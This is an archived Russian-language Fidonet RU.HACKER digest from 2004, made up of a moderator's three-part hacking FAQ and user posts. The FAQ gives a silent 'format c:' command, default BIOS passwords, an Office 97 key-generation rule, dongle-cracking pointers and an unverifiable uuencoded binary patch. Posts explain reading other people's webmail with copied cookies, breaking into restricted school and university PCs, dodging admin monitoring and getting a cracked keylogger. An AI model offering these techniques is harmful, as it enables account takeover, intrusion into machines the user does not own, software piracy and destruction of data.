бэкап секьюрности с диска C:\? Что ни делаю ── просит AS>> указать the source to backup from... SA> Все пошло, выбираешь диск Security - Backup Security - выбираешь куда SA> (я указал другой диск) и жмакаешь Run Разобрался. Проблема была в некачественном лекарстве от жадности. /Sincerely yours, Alex./ ... np: Marty Friedman - Triumph --- Win2000 Server SP4 uptime: 0 day(s) 2 hour(s) 53 min(s) * Origin: -= AlexSu Station =- (2:5022/59.72) = Здесь обитают хакеры ====================================================New= Msg : 9587 [1-10330] K/s From : Moderator's Post 02-May-04 00:00:04 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9588 [1-10330] K/s From : Moderator's Post 02-May-04 00:00:04 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9589 [1-10330] K/s From : Moderator's Post 02-May-04 00:00:04 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9590 [1-10330] From : Pavel Uwarov 02-May-04 16:02:58 2:5012/2.328 To : Yaroslav Makarov 2:478/37.14 Subj : Help =====================================================================RU.HACKER= /----------------------/ 24 Апреля 2004 ИИ не отвечает на письмо ты к All: YM> Подскажите плиз что надо сделать чтобы я получил права админа компе YM> ,то мой учитель по информатике все права мне обрезал(даже копировать YM> нельзя) Заранее благодарен с дискеты грузануть можешь? если да, то есть множество способов как исправить эту несправедливость Pauk aka Pavel Uwarov счас вышибает мозги: Алиса - Православные --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Hе все то Windows, что висит. (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 9591 [1-10330] From : Alex Chekerys 02-May-04 16:13:58 2:4635/1024.63 To : Anton Nechiporenko 2:6003/7.61 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Hi, /Anton!/ Воскресенье 25 Апрель 2004, Anton Nechiporenko wrote to Anton Dyachuk: AN> Hallo Anton AN> течении ~15 мин. включаюсь то попадаю на свой ак(даже с другим айпи!).. В AN> броузере все настройки проковырял и никак не могу врубится в чем тут AN> дело.. Ы? на своЙ АКК ТЫ с другого ип не попадёшь.. например, ты сидел в одном клубе.. в инете... закрыл асьт+ф , пошёл в другой клуб,... на свой ящик т? уже с другого не попадёшь ;) даже если принесёшь с собой кукисы и привяжешь их к новому юзверю... так что этот вариант больше для одного ип, кестать, если всё ходится через проксю, то действительно существует возможность читать чужую почту.. берём с соседней тачки куки, пишем себе, жмём ф5.. и наслаждаемся ;) проверено на hotbox.ru|mail.ru|ukr.net(!), почему я выделил ukr.net ? потому что это самая большая ж0п4... и ящик там делать вообще врагам даже не советую =) письма релеятся где-то минут 15.. иногда больше, иногда у них сервак глючит... почта с зоны *.ру доходит минут за 20-30... в общем.. AN> Усё, регламент! Всего тебе сАмого, Anton! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Christ (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9592 [1-10330] From : Andrew Rinevskiy 01-May-04 20:15:29 2:450/143.354 To : Sergey Dorozhkin 2:5022/128.14 Subj : Мдя =====================================================================RU.HACKER= Приветствую твой разум, Sergey! NN>>> Хотел тут немножко поломать компы в унивеpе. Ага. Счаз. NN>>> Хотел гpузануть с флопа и утянуть SAM. Гpузится сpазу с винта. Hа NN>>> биосе - паpоль. Биос - Award 6.0 то есть пpо унивеpсальные паpоли NN>>> можно забыть. SD> А как на счет закоpотить батаpейку? А как насчет материнок с дуал-биосом и незапаянной перемычной сброса? dottir@vessobel.by [ Planet Earth / Time Police ] --- GoldED/386 3.0.1 * Origin: Radiolink - вiдiрвись вiд дротiв! (2:450/143.354) = Здесь обитают хакеры ====================================================New= Msg : 9593 [1-10330] From : Alex Chekerys 02-May-04 17:04:20 2:4635/1024.63 To : Dmitriy Klabukov 2:5056/16.29 Subj : Посоветуйте тpоянчик. =====================================================================RU.HACKER= Hi, /Dmitriy!/ Четверг 29 Апрель 2004, Dmitriy Klabukov wrote to All: keylogger : Stealth Keyboard Interceptor 5.0|6.0(need crack) Всего тебе сАмого, Dmitriy! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9594 [1-10330] From : Alex Chekerys 02-May-04 17:05:36 2:4635/1024.63 To : Nick Nazarenko 2:5055/113.16 Subj : Мдя =====================================================================RU.HACKER= Hi, /Nick!/ Среда 21 Апрель 2004, Nick Nazarenko wrote to All: это не в ЧИТИ случаем ? ситуация подобная, везде касперские, но... один интересный момент... админы местные там багтрек редко читают, соответственно последние 14 багов в винде не пофиксены, да что уж там говорить если даже ие не патченый ;)..... единиственный облом- юзер с правами чуть ли не гостя, ;).. кстати, слышал что на AWARD 6 всё-таки есть стандартные пароли, может, кто-то знает ? на phoenix биос нарыл (в основном на матях альбатрон встречается).. да, забыл, на всех компах установлен радмин, и периодически действия юзера мониторятся... либо через него, либо физическим заглядыванием в мониторы ... первое видно по netstat -a... выгрузить r_server /stop не полчается ;) были бы привелегии повыше.. стоп. есть идея.... проверю, потом скажу ; пиплы, есть ещё какие-нить мысли по сабжу вроде например подойти к админу с ломом/пивом Всего тебе сАмого, Nick! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9595 [1-10330] From : Alex Chekerys 02-May-04 17:11:12 2:4635/1024.63 To : Sergey Dorozhkin 2:5022/128.14 Subj : Мдя =====================================================================RU.HACKER= Hi, /Sergey!/ Суббота 01 Май 2004, Sergey Dorozhkin wrote to Nick Nazarenko: SD> А как на счет закоpотить батаpейку? тачки закручены и опечатаны, впрочем они забыли про одну вещщ, корпуса-то Avance, у них морда снимается... кто-то даже умудрился так с одной тачки мозги сп:№%;дить... так что если нажать на ресет, посмотреть что за мамка, нарыть доку по ней в инете, и посмотреть где же это грёб. джампер, то можно и вслепую.. да и батарейку нащупать я думаю не проблема ;).... есть одно но: админы иногда рядом шляются... и даже не иногда а очень часто.. Всего тебе сАмого, Sergey! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Lord (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9596 [1-10330] From : Alex Chekerys 02-May-04 17:13:39 2:4635/1024.63 To : Andrew Komardin 2:5075/37.1 Subj : Help! =====================================================================RU.HACKER= Hi, /Andrew!/ Понедельник 19 Апрель 2004, Andrew Komardin wrote to Yuri Baranov: AK> 1. Перезагрузаеш машинку. AK> 2. При появлении строки загрузчика пишеш комманду boot -s для загрузки в AK> однопользовательском режиме. AK> 3. После появления командной строки даеш комманду mount -u / для AK> перемонтирования / в режим rw. AK> 4. passwd сменит пароль рута. это тебе не линух, фокус не пройдёт =) Всего тебе сАмого, Andrew! --- GoldED+/W32 1.1.4.7 * Origin: Christians (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9597 [1-10330] From : Sergey Alexeev 02-May-04 16:58:04 2:5013/21.14 To : All Subj : немного не в тему: пpо модем =====================================================================RU.HACKER= Hello All такая байда: можно ли пpошить внешний модем Courier V.Everything with V.34 чтоб деpжал 56600 на команду ati7 отвечает: product type: Russia(ex. US/Canada) External options: hst, v32bis, terbo, vfc, v34+, x2, v90 fax options: class1, class2.0 clock freq: 20.16mhz flash rom: 512k ram: 64k на команду ati3 пишет: usrRobotics Courier V.Everything если можно, то, плиз киньте линки на пеpепpошивку. ЗЫЖ хотя в винде отдетектен почему-то как Courier V.Everything V.90 X2 European Pnp. как такое возможно? может, момед был пpошит pанее??? хотя скоpость выше 33000 не поднимается:(( Bye --- FIPS/Phoenix * Origin: 